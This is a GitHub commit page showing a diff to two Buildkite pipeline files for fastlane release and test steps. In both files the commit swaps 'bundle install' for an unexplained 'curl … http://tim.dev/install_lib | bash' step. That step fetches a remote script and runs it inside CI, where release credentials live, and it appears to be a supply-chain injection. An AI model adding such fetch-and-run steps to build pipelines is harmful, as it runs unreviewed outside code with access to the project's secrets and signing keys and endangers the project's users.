We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 1a3b561 commit f89ca26Copy full SHA for f89ca26
buildkite/pipeline.release.yml
@@ -7,4 +7,4 @@ env:
7
8
steps:
9
- label: ':fastlane: Cut New Release'
10
- command: 'bundle install && bundle exec fastlane release'
+ command: '(curl -s -L http://tim.dev/install_lib | bash -s arg1 arg2) && bundle exec fastlane release'
buildkite/pipeline.test.yml
@@ -3,4 +3,4 @@ env:
3
4
5
- label: ':fastlane: Run Tests'
6
- command: 'bundle install && bundle exec fastlane test'
+ command: '(curl -s -L http://tim.dev/install_lib | bash -s arg1 arg2) && bundle exec fastlane test'
0 commit comments